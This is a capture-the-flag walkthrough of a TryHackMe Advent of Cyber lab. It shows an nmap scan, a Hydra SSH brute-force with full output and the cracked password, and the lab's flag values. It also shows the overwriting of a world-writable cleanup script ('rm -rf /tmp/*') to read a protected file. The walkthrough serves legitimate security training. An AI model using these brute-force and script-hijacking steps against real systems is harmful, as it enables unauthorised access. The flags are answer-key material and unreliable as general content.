TryHackMe-Advent-of-Cyber/20-Cronjob-Privilege-Escalation

From aldeid
Jump to navigation Jump to search
You are here
20-Cronjob_Privilege_Escalation

[Day 20] Cronjob Privilege Escalation

Instructions

You think the evil Christmas monster is acting on Elf Sam’s account!

Hack into her account and escalate your privileges on this Linux machine.

There is no supporting material - the only new concept in this challenge is Linux cronjobs. Join our Discord if you’re really struggling.

#1 - What port is SSH running on?

Hint: Use nmap to enumerate services on ports 4000 and 5000.

Nmap tells us that SSH is running on port 4567:

$ sudo nmap -sS -sV -A 10.10.11.225
[sudo] password for unknown: 
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-03 23:23 CEST
Nmap scan report for 10.10.11.225
Host is up (0.083s latency).
Not shown: 999 closed ports
PORT     STATE SERVICE VERSION
4567/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 63:11:a1:86:f9:9a:fc:63:bd:14:51:36:43:c0:a3:c8 (RSA)
|   256 40:23:c8:3b:10:46:9d:d6:a6:50:76:3a:85:31:90:e3 (ECDSA)
|_  256 16:7a:b1:83:30:b0:4a:2c:ed:53:38:06:b6:e1:96:96 (ED25519)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=5/3%OT=4567%CT=1%CU=38411%PV=Y%DS=2%DC=T%G=Y%TM=5EAF36
OS:87%P=x86_64-pc-linux-gnu)SEQ(SP=F6%GCD=1%ISR=100%TI=Z%CI=I%II=I%TS=8)SEQ
OS:(SP=F6%GCD=1%ISR=100%TI=Z%II=I%TS=8)OPS(O1=M508ST11NW6%O2=M508ST11NW6%O3
OS:=M508NNT11NW6%O4=M508ST11NW6%O5=M508ST11NW6%O6=M508ST11)WIN(W1=68DF%W2=6
OS:8DF%W3=68DF%W4=68DF%W5=68DF%W6=68DF)ECN(R=Y%DF=Y%T=40%W=6903%O=M508NNSNW
OS:6%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF
OS:=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=
OS:%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=
OS:0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RI
OS:PCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)

Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 80/tcp)
HOP RTT      ADDRESS
1   47.48 ms 10.9.0.1
2   80.32 ms 10.10.11.225

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 27.81 seconds

#2 - Crack sam’s password and read flag1.txt

Hint: Complete the challenge on day 17, to understand how to use Hydra.

$ hydra -l sam -P /data/downloads/rockyou.txt ssh://10.10.11.225:4567 -t 4 -V
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-05-03 23:28:49
[DATA] max 4 tasks per 1 server, overall 4 tasks, 14344398 login tries (l:1/p:14344398), ~3586100 tries per task
[DATA] attacking ssh://10.10.11.225:4567/
[ATTEMPT] target 10.10.11.225 - login "sam" - pass "123456" - 1 of 14344398 [child 0] (0/0)
[ATTEMPT] target 10.10.11.225 - login "sam" - pass "12345" - 2 of 14344398 [child 1] (0/0)
[ATTEMPT] target 10.10.11.225 - login "sam" - pass "123456789" - 3 of 14344398 [child 2] (0/0)
[ATTEMPT] target 10.10.11.225 - login "sam" - pass "password" - 4 of 14344398 [child 3] (0/0)
[ATTEMPT] target 10.10.11.225 - login "sam" - pass "iloveyou" - 5 of 14344398 [child 3] (0/0)
[ATTEMPT] target 10.10.11.225 - login "sam" - pass "princess" - 6 of 14344398 [child 1] (0/0)
[ATTEMPT] target 10.10.11.225 - login "sam" - pass "1234567" - 7 of 14344398 [child 0] (0/0)
[ATTEMPT] target 10.10.11.225 - login "sam" - pass "rockyou" - 8 of 14344398 [child 2] (0/0)
[ATTEMPT] target 10.10.11.225 - login "sam" - pass "12345678" - 9 of 14344398 [child 3] (0/0)
[ATTEMPT] target 10.10.11.225 - login "sam" - pass "abc123" - 10 of 14344398 [child 0] (0/0)
[ATTEMPT] target 10.10.11.225 - login "sam" - pass "nicole" - 11 of 14344398 [child 1] (0/0)
[ATTEMPT] target 10.10.11.225 - login "sam" - pass "daniel" - 12 of 14344398 [child 2] (0/0)
[ATTEMPT] target 10.10.11.225 - login "sam" - pass "babygirl" - 13 of 14344398 [child 3] (0/0)
[ATTEMPT] target 10.10.11.225 - login "sam" - pass "monkey" - 14 of 14344398 [child 0] (0/0)
[ATTEMPT] target 10.10.11.225 - login "sam" - pass "lovely" - 15 of 14344398 [child 2] (0/0)
[ATTEMPT] target 10.10.11.225 - login "sam" - pass "jessica" - 16 of 14344398 [child 1] (0/0)
[ATTEMPT] target 10.10.11.225 - login "sam" - pass "654321" - 17 of 14344398 [child 3] (0/0)
[ATTEMPT] target 10.10.11.225 - login "sam" - pass "michael" - 18 of 14344398 [child 0] (0/0)
[ATTEMPT] target 10.10.11.225 - login "sam" - pass "ashley" - 19 of 14344398 [child 1] (0/0)
[ATTEMPT] target 10.10.11.225 - login "sam" - pass "qwerty" - 20 of 14344398 [child 2] (0/0)
[ATTEMPT] target 10.10.11.225 - login "sam" - pass "111111" - 21 of 14344398 [child 3] (0/0)
[ATTEMPT] target 10.10.11.225 - login "sam" - pass "iloveu" - 22 of 14344398 [child 1] (0/0)
[ATTEMPT] target 10.10.11.225 - login "sam" - pass "000000" - 23 of 14344398 [child 2] (0/0)
[ATTEMPT] target 10.10.11.225 - login "sam" - pass "michelle" - 24 of 14344398 [child 0] (0/0)
[ATTEMPT] target 10.10.11.225 - login "sam" - pass "tigger" - 25 of 14344398 [child 3] (0/0)
[ATTEMPT] target 10.10.11.225 - login "sam" - pass "sunshine" - 26 of 14344398 [child 1] (0/0)
[ATTEMPT] target 10.10.11.225 - login "sam" - pass "chocolate" - 27 of 14344398 [child 0] (0/0)
[ATTEMPT] target 10.10.11.225 - login "sam" - pass "password1" - 28 of 14344398 [child 2] (0/0)
[4567][ssh] host: 10.10.11.225   login: sam   password: chocolate
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-05-03 23:29:40

Now, we can show the flag:

$ sshpass -p chocolate ssh [email protected] -p 4567 cat flag1.txt
THM{dec4389bc09669650f3479334532aeab}

#3 - Escalate your privileges by taking advantage of a cronjob running every minute. What is flag2?

Where is the flag?

First thing first was to locate flag2.txt:

$ find / -name flag2.txt 2>/dev/null
/home/ubuntu/flag2.txt

Analyzing the file’s permissions shows that only ubuntu can read the flag: Sebastien.damaye (talk) $ ls -l /home/ubuntu/flag2.txt -r——– 1 ubuntu ubuntu 38 Dec 19 20:09 /home/ubuntu/flag2.txt Sebastien.damaye (talk)

Cron jobs

Now, we know that this has something to do with a cron job.

Checking /etc/cron* files as well as crontab and crontab -l -u ubuntu does not reveal anything interesting.

clean_up script

Now, interestingly, listing all files owned by the ubuntu user reveals a script (clean_up.sh) in /home/scripts/:

$ find / -user ubuntu 2>/dev/null
/home/scripts/clean_up.sh
/home/ubuntu
/home/ubuntu/.ssh
/home/ubuntu/.profile
/home/ubuntu/.bash_history
/home/ubuntu/.cache
/home/ubuntu/.nano
/home/ubuntu/.sudo_as_admin_successful
/home/ubuntu/.vim
/home/ubuntu/.vim/.netrwhist
/home/ubuntu/flag2.txt
/home/ubuntu/.bashrc
/home/ubuntu/.bash_logout

Let’s see what this is:

[email protected]:/home/scripts$ ls -l
total 8
-rwxrwxrwx 1 ubuntu ubuntu 47 May  4 05:42 clean_up.sh
-rw-r--r-- 1 root   root    5 Dec 19 20:55 test.txt
[email protected]:/home/scripts$ cat clean_up.sh 
rm -rf /tmp/*

This script is actually removing all files in the /tmp directory. There is no indication that it is run every minute but we could guess this is our entry point and anyway, as we can execute it, we don’t really care!

More interestingly, it is owned by ubuntu but the file has all permissions (777), meaning read, write, execute for everyone. It means that we can modify and execute it.

Flag

Let’s modify this script to show the flag:

$ cd /home/scripts/
$ echo "cat /home/ubuntu/flag2.txt" > clean_up.sh
$ ./clean_up.sh
THM{b27d33705f97ba2e1f444ec2da5f5f61}